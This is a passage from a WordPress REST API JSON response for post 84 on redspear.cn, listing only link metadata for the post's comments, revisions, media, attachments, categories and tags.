p\/v2\/comments?post=84"}],"version-history":[{"count":3,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/84\/revisions"}],"predecessor-version":[{"id":141,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/84\/revisions\/141"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media\/85"}],"wp:attachment":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media?parent=84"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/categories?post=84"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/tags?post=84"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}